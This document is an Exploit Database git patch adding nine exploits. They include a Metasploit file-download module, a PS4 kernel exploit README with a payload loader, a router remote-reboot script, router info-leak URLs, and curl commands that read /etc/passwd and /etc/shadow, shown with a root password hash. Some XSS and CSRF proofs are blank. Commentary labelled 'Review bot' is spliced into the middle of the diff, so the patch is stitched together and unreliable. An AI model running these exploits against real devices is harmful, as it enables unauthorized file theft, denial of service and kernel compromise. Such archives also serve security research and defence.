From 267f841bd81068c7101a8f74d35e1bc3d7581259 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Thu, 28 Dec 2017 05:02:19 +0000
Subject: [PATCH] DB: 2017-12-28
9 changes to exploits/shellcodes
Telesquare SKT LTE Router SDT-CS3B1 - Denial of Service
SysGauge Server 3.6.18 - Denial of Service
ALLMediaServer 0.95 - Buffer Overflow
Sony Playstation 4 4.05 FW - Local Kernel Loader
Xerox DC260 EFI Fiery Controller Webtools 2.0 - Arbitrary File Disclosure
Easy!Appointments 1.2.1 - Cross-Site Scripting
Telesquare SKT LTE Router SDT-CS3B1 - Cross-Site Request Forgery
Telesquare SKT LTE Router SDT-CS3B1 - Information Disclosure
DotNetNuke DreamSlider 01.01.02 - Arbitrary File Download
---
 exploits/aspx/webapps/43405.rb | 131 ++++++++++++++++++++++++
 exploits/bsd/local/43397.md | 32 ++++++
 exploits/hardware/dos/43401.py | 62 ++++++++++++
 exploits/hardware/webapps/43400.html | 55 +++++++++++
 exploits/hardware/webapps/43402.txt | 53 ++++++++++
 exploits/php/webapps/43398.txt | 142 +++++++++++++++++++++++++++
 exploits/php/webapps/43399.txt | 112 +++++++++++++++++++++
 exploits/windows/dos/43403.py | 41 ++++++++
 exploits/windows/dos/43406.py | 44 +++++++++
 files_exploits.csv | 9 ++
 10 files changed, 681 insertions(+)
 create mode 100755 exploits/aspx/webapps/43405.rb
 create mode 100644 exploits/bsd/local/43397.md
 create mode 100755 exploits/hardware/dos/43401.py
 create mode 100644 exploits/hardware/webapps/43400.html
 create mode 100644 exploits/hardware/webapps/43402.txt
 create mode 100644 exploits/php/webapps/43398.txt
 create mode 100644 exploits/php/webapps/43399.txt
 create mode 100755 exploits/windows/dos/43403.py
 create mode 100755 exploits/windows/dos/43406.py
diff --git a/exploits/aspx/webapps/43405.rb b/exploits/aspx/webapps/43405.rb
new file mode 100755
index 000000000..cd81aad5a
--- /dev/null
+++ b/exploits/aspx/webapps/43405.rb
@@ -0,0 +1,131 @@
+# Exploit Title: DotNetNuke DreamSlider Arbitrary File Download
+# Date: 23/01/2014
+# Author: Glafkos Charalambous
+# Version: 01.01.02
+# Vendor: DreamSlider
+# Vendor URL: http://www.dreamslider.com/
+# Google Dork: inurl:/DesktopModules/DreamSlider/
+# CVE:
+#
+# Description
+# DotNetNuke DreamSlider Module prior to version X suffer from a remote unauthenticated arbitrary file download vulnerability
+#
+# Vulnerable Code
+#
+# namespace DotNetNuke.Modules.DreamSlider
+# {
+# using System;
+# using System.IO;
+# using System.Web.SessionState;
+# using System.Web.UI;
+#
+# public class DownloadProvider : Page, IRequiresSessionState
+# {
+# protected void Page_Load(object sender, EventArgs e)
+# {
+# if (!base.IsPostBack && (base.Request.QueryString["File"] != null))
+# {
+# string path = base.Request.QueryString["File"];
+# string fileName = Path.GetFileName(path);
+# base.Response.ContentType = "application/octet-stream";
+# base.Response.AddHeader("Content-Disposition", "attachment; filename=" + fileName);
+# base.Response.WriteFile(path);
+# base.Response.End();
+# }
+# }
+# }
+# }
+
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+ Rank = ExcellentRanking
+
+ include Msf::Auxiliary::Report
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => 'DotNetNuke DreamSlider Arbitrary File Download',
+ 'Description' => %q{
+ This module exploits an unauthenticated arbitrary file download vulnerability in DNN
+ DreamSlider version 01.01.02 and below.
+ },
+ 'Author' =>
+ [
+ 'Glafkos Charalambous', # Discovery and Metasploit module
+ ],
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ [ 'URL', 'http://metasploit.com' ]
+ ],
+ 'DisclosureDate' => 'Mar 23 2015'))
+
+ register_options(
+ [
+ Opt::RPORT(80),
+ OptString.new('FILENAME', [true, 'File to download', '~/web.config']),
+ OptString.new('PATH', [true, 'Path of DNN Nuke', '/']),
+ ], self.class)
+ end
+
+ def check
+ begin
+
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => normalize_uri(datastore['PATH'],"/DesktopModules/DreamSlider/DownloadProvider.aspx"),
+ 'cookie' => datastore['Cookie'],
+ })
+
+ if res && res.code == 200 and res.body.to_s =~ /Download Provider/
+ return Exploit::CheckCode::Vulnerable
+ else
+ return Exploit::CheckCode::Safe
+ end
+ Exploit::CheckCode::Safe
+ end
+ end
+
+ def run
+ begin
+ print_status("#{peer} - Downloading file #{datastore['FILENAME']}")
+
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => normalize_uri(datastore['PATH'],"/DesktopModules/DreamSlider/DownloadProvider.aspx?File=") + datastore['FILENAME'],
+ 'cookie' => datastore['Cookie'],
+ })
+
+ rescue Rex::ConnectionError
+ print_error("#{peer} - Could not connect.")
+ return
+ end
+
+ if res && res.code == 200
+ if res.body.to_s.bytesize == 0
+ print_error("#{peer} - 0 bytes returned, file does not exist or it is empty.")
+ return
+ end
+
+ fileName = datastore['FILENAME']
+
+ path = store_loot(
+ 'ds.http',
+ 'application/octet-stream',
+ datastore['RHOST'],
+ res.body,
+ fileName
+ )
+ print_good("#{peer} - File saved in: #{path}")
+ else
+ print_error("#{peer} - Failed to download file.")
+ end
+ end
+end
\ No newline at end of file
diff --git a/exploits/bsd/local/43397.md b/exploits/bsd/local/43397.md
new file mode 100644
index 000000000..c1fd66608
--- /dev/null
+++ b/exploits/bsd/local/43397.md
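Review bot: In `check`, the `begin` block has no matching `rescue`, so a `Rex::ConnectionError` from `send_request_cgi` propagates out of the check instead of being handled the way `run` handles it, and the `Exploit::CheckCode::Safe` line after the `if`/`else` is unreachable because both branches `return`. Adding `rescue Rex::ConnectionError` with `return Exploit::CheckCode::Unknown` before the inner `end` and dropping the dead line would make `check` consistent with `run`. `datastore['Cookie']` is sent by both methods but never registered in `register_options`, so the header value is always nil; either register the option or remove the key. The condition `res && res.code == 200 and res.body.to_s =~ /Download Provider/` mixes `&&` and `and` and only works because `and` binds loosest; `&&` throughout reads unambiguously. For detection, both requests hit `/DesktopModules/DreamSlider/DownloadProvider.aspx`, the second with a `File` query value, which is a straightforward pattern to alert on in IIS logs.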
@@ -0,0 +1,32 @@
+# PS4 4.05 Kernel Exploit
+---
+## Summary
+In this project you will find a full implementation of the "namedobj" kernel exploit for the PlayStation 4 on 4.05. It will allow you to run arbitrary code as kernel, to allow jailbreaking and kernel-level modifications to the system. This release however, *does not* contain any code related to defeating anti-piracy mechanisms or running homebrew. This exploit does include a loader that listens for payloads on port `9020` and will execute them upon receival.
+
+You can find fail0verflow's original write-up on the bug [here](https://fail0verflow.com/blog/2017/ps4-namedobj-exploit/), you can find my technical write-up which dives more into implementation specifics ~~here~~ (this is still in progress and will be published within the next few days).
+
+## Patches Included
+The following patches are made by default in the kernel ROP chain:
+1) Disable kernel write protection
+2) Allow RWX (read-write-execute) memory mapping
+3) Dynamic Resolving (`sys_dynlib_dlsym`) allowed from any process
+4) Custom system call #11 (`kexec()`) to execute arbitrary code in kernel mode
+5) Allow unprivileged users to call `setuid(0)` successfully. Works as a status check, doubles as a privilege escalation.
+
+## Notes
+- This exploit is actually incredibly stable at around 95% in my tests. WebKit very rarely crashes and the same is true with kernel.
+- I've built in a patch so the kernel exploit will only run once on the system. You can still make additional patches via payloads.
+- A custom syscall is added (#11) to execute any RWX memory in kernel mode, this can be used to execute payloads that want to do fun things like jailbreaking and patching the kernel.
+- An SDK is not provided in this release, however a barebones one to get started with may be released at a later date.
+- I've released a sample payload [here](http://www.mediafire.com/file/n4boybw0e06h892/debug_settings.bin) that will make the necessary patches to access the debug menu of the system via settings, jailbreaks, and escapes the sandbox.
+
+## Contributors
+I was not alone in this exploit's development, and would like to thank those who helped me along the way below.
+
+- [qwertyoruiopz](https://twitter.com/qwertyoruiopz)
+- [Flatz](https://twitter.com/flat_z)
+- [CTurt](https://twitter.com/CTurtE)
+- Anonymous
+
+
+E-DB Note: Download ~ https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/43397.zip
\ No newline at end of file
diff --git a/exploits/hardware/dos/43401.py b/exploits/hardware/dos/43401.py
new file mode 100755
index 000000000..e16caf35c
--- /dev/null
+++ b/exploits/hardware/dos/43401.py
@@ -0,0 +1,62 @@
+#!/usr/bin/env python
+#
+#
+# Telesquare SKT LTE Router SDT-CS3B1 Remote Reboot Denial Of Service
+#
+#
+# Vendor: Telesquare Co., Ltd.
+# Product web page: http://www.telesquare.co.kr
+# Affected version: FwVer: SDT-CS3B1, sw version 1.2.0
+# LteVer: ML300S5XEA41_090 1 0.1.0
+# Modem model: PM-L300S
+#
+# Summary: We introduce SDT-CS3B1 LTE router which is a SKT 3G and 4G
+# LTE wireless communication based LTE router product.
+#
+# Desc: The router suffers from an unauthenticated reboot command execution.
+# Attackers can exploit this issue to cause a denial of service scenario.
+#
+# --------------------------------------------------------------------
+# /lte/lteuicc.shtml:
+# -------------------
+#
+# 858: function RebootRequest()
+# 859: {
+# 860: var url = "../cgi-bin/lte.cgi?";
+# 861: var param = "Command=Reboot";
+# 862: XHRPost(RebootHandle, url, param, false ); //sync call
+# 863: }
+#
+# --------------------------------------------------------------------
+#
+# Tested on: lighttpd/1.4.20
+#
+#
+# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+# @zeroscience
+#
+#
+# Advisory ID: ZSL-2017-5444
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5444.php
+#
+#
+# 22.12.2017
+#
+
+
+import sys, requests
+
+if len(sys.argv) < 2:
+ print 'SKT LTE Router SDT-CS3B1 Remote Reboot'
+ print 'Usage: b00t.py \n'
+ quit()
+
+ip = sys.argv[1]
+port = sys.argv[2]
+
+r = requests.get("http://"+ip+":"+port+"/cgi-bin/lte.cgi?Command=Reboot")
+
+# shw: while true; do ./b00t.py 10.0.0.17 8081; sleep 20; done
+#print r.content #if in r.content: , reboot true.
+
+print "Router rebooted."
\ No newline at end of file
diff --git a/exploits/hardware/webapps/43400.html b/exploits/hardware/webapps/43400.html
new file mode 100644
index 000000000..9c2e25ffd
--- /dev/null
+++ b/exploits/hardware/webapps/43400.html
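Review bot: The guard `if len(sys.argv) < 2:` does not cover `port`, which is read from `sys.argv[2]` a few lines later, so invoking the script with only an IP raises `IndexError` instead of printing the usage text; it should be `if len(sys.argv) < 3:`. The closing `print "Router rebooted."` runs regardless of the response — `r.status_code` and `r.content` are never inspected (the `#if in r.content:` comment suggests a check was planned), so a 404 or a non-router host is reported as success. The usage string `'Usage: b00t.py \n'` appears to have lost its argument placeholders, presumably angle-bracket text stripped in rendering, and the script is Python 2 only (print statements). On the defender side the issue is a single unauthenticated GET to `/cgi-bin/lte.cgi?Command=Reboot`, so the fix belongs at the CGI itself (enforce the session check there, not only on the `lteuicc.shtml` page that calls `RebootRequest()`), and the request is easy to spot in the lighttpd access log.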
@@ -0,0 +1,55 @@
+Telesquare SKT LTE Router SDT-CS3B1 CSRF System Command Execution
+
+
+Vendor: Telesquare Co., Ltd.
+Product web page: http://www.telesquare.co.kr
+Affected version: FwVer: SDT-CS3B1, sw version 1.2.0
+ LteVer: ML300S5XEA41_090 1 0.1.0
+ Modem model: PM-L300S
+
+Summary: We introduce SDT-CS3B1 LTE router which is a SKT 3G and 4G
+LTE wireless communication based LTE router product.
+
+Desc: The router suffers from authenticated arbitrary system command
+execution. The application interface allows users to perform certain
+actions via HTTP requests without performing any validity checks to
+verify the requests. This can be exploited to perform certain actions
+with administrative privileges if a logged-in user visits a malicious
+web site.
+
+Tested on: lighttpd/1.4.20
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2017-5443
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5443.php
+
+
+22.12.2017
+
+--
+
+
+IDOR for system command interface:
+----------------------------------
+
+GET /admin/system_command.shtml HTTP/1.1
+
+
+
+PoC GET CSRF request:
+---------------------
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/exploits/hardware/webapps/43402.txt b/exploits/hardware/webapps/43402.txt
new file mode 100644
index 000000000..af5e1e68d
--- /dev/null
+++ b/exploits/hardware/webapps/43402.txt
@@ -0,0 +1,53 @@
+Telesquare SKT LTE Router SDT-CS3B1 Insecure Direct Object Reference Info Leak
+
+
+Vendor: Telesquare Co., Ltd.
+Product web page: http://www.telesquare.co.kr
+Affected version: FwVer: SDT-CS3B1, sw version 1.2.0
+ LteVer: ML300S5XEA41_090 1 0.1.0
+ Modem model: PM-L300S
+
+Summary: We introduce SDT-CS3B1 LTE router which is a SKT 3G and 4G
+LTE wireless communication based LTE router product.
+
+Desc: Insecure direct object references occur when an application
+provides direct access to objects based on user-supplied input. As
+a result of this vulnerability attackers can bypass authorization
+and access resources and functionalities in the system.
+
+Tested on: lighttpd/1.4.20
+Linux mips
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2017-5445
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5445.php
+
+
+22.12.2017
+
+--
+
+
+
+/home.html << Version and status info leak (firmware, device, type, modem, lte)
+/index.html << Version and status info leak (firmware, device, type, modem, lte)
+/nas/smbsrv.shtml << Samba server settings (workgroup, netbios name)
+/nas/ftpsrv.shtml << FTP settings
+/wifi2g/basic.shtml << Wireless settings
+/admin/status.shtml << Access point status info leak
+/internet/wan.shtml << WAN settings info leak (wanip, subnet, gateway, macaddr, lteipaddr, dns)
+/internet/lan.shtml << LAN settings info leak (dhcpip, lanip, macaddr, gateway, subnet, dns)
+/admin/statistic.shtml << System statistics info leak
+/admin/management.shtml << System management (account settings, ntp settings, ddns settings)
+/serial/serial_direct.shtml << Direct serial settings (network connection settings, serverip, port)
+/admin/system_command.shtml << System command interface
+/internet/dhcpcliinfo.shtml << DHCP Clients info leak (hostname, macaddr, ipaddr)
+/admin/upload_firmware.shtml << Router firmware and lte firmware upgrade
+/firewall/vpn_futuresystem.shtml << VPN 
settings (udp packet transfer, icmp check)
+/cgi-bin/lte.cgi?Command=getUiccState << GetUiccState()
+/cgi-bin/lte.cgi?Command=getModemStatus << Modem status info leak
+/cgi-bin/systemutil.cgi?Command=SystemInfo << System info leak
\ No newline at end of file
diff --git a/exploits/php/webapps/43398.txt b/exploits/php/webapps/43398.txt
new file mode 100644
index 000000000..d40ff05e5
--- /dev/null
+++ b/exploits/php/webapps/43398.txt
@@ -0,0 +1,142 @@
+Xerox DC260 EFI Fiery Controller Webtools 2.0 Arbitrary File Disclosure
+
+
+Vendor: Electronics for Imaging, Inc.
+Product web page: http://www.efi.com
+Affected version: EFI Fiery Controller SW2.0
+ Xerox DocuColor 260, 250, 242
+
+Summary: Drive production profitability with Fiery servers and workflow
+products. See which Fiery digital front end is right for your current
+or future print engines and business needs. Manage all your printers
+from a single screen using this intuitive print job management interface.
+
+Desc: Input passed thru the 'file' GET parameter in 'forceSave.php'
+script is not properly sanitized before being used to read files. This
+can be exploited by an unauthenticated attacker to read arbitrary files
+on the affected system.
+
+======================================================================
+/wt3/js/save.js:
+----------------
+
+103: function parseSaveMessages() {
+104: var urlNode = saveDocument.getElementsByTagName('url').item(0);
+105: var url = urlNode.firstChild.data;
+106: var forcedSaveUrl = "forceSave.php?file=" + url;
+107: window.open(forcedSaveUrl, 'save_iframe', 'width=1,height=1');
+
+====
+
+/wt3/forceSave.php:
+-------------------
+ 1.
+
+======================================================================
+
+
+Tested on: Debian GNU/Linux 3.1
+ Apache
+ PHP/5.4.41
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2017-5447
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5447.php
+
+
+20.12.2017
+
+--
+
+
+# curl "http://10.0.0.19/wt3/forceSave.php?file=/etc/passwd"
+root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/bin/sh
+bin:x:2:2:bin:/bin:/bin/sh
+sys:x:3:3:sys:/dev:/bin/sh
+sync:x:4:100:sync:/bin:/bin/sync
+games:x:5:100:games:/usr/games:/bin/sh
+...
+...
+
+
+# curl "http://10.0.0.19/wt3/forceSave.php?file=/etc/shadow"
+root:LUUVeT6GbOy9I:10978:0:99999:7:::
+daemon:*:10979:0:99999:7:::
+bin:*:10979:0:99999:7:::
+sys:*:10979:0:99999:7:::
+sync:*:10979:0:99999:7:::
+games:*:10979:0:99999:7:::
+...
+...
\ No newline at end of file
diff --git a/exploits/php/webapps/43399.txt b/exploits/php/webapps/43399.txt
new file mode 100644
index 000000000..159df1125
--- /dev/null
+++ b/exploits/php/webapps/43399.txt
@@ -0,0 +1,112 @@
+Easy!Appointments v1.2.1 Multiple Stored XSS Vulnerabilities
+
+
+Vendor: Alex Tselegidis
+Product web page: http://www.easyappointments.org
+Affected version: 1.2.1
+
+Summary: Easy!Appointments is a highly customizable web application
+that allows your customers to book appointments with you via the web.
+Moreover, it provides the ability to sync your data with Google Calendar
+so you can use them with other services. It is an open source project
+and you can download and install it even for commercial use. Easy!Appointments
+will run smoothly with your existing website, because it can be installed
+in a single folder of the server and of course, both sites can share
+the same database. Learn more about the project in the Features page.
+
+Desc: The application suffers from multiple stored and reflected XSS
+vulnerabilities. The issues are triggered when an unauthorized input
+passed via multiple POST and GET parameters is not properly sanitized
+before being returned to the user. This can be exploited to execute
+arbitrary HTML and script code in a user's browser session in context
+of an affected site.
+
+Tested on: Apache/2.4.23 (Win32)
+ OpenSSL/1.0.2h
+ MariaDB-10.1.19
+ PHP/5.6.28
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2017-5442
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5442.php
+
+
+20.10.2017
+
+--
+
+
+PoC:
+
+{"name":"XSS1","description":"Description"}
+
+
+
+
+
+
+
+
+ + + +--- + + + +
+
+
+
+
+
+
+
+
+ + + +--- + + + +
+
+
+
+
+
+
+
+
+ + + +--- + + + +
+
+
+
+
+
+
+
+
+